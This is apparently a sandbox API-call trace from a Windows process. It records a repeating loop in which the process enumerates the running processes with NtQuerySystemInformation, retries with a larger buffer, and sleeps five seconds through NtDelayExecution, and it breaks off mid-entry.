[0220.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.653] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.788] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.804] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 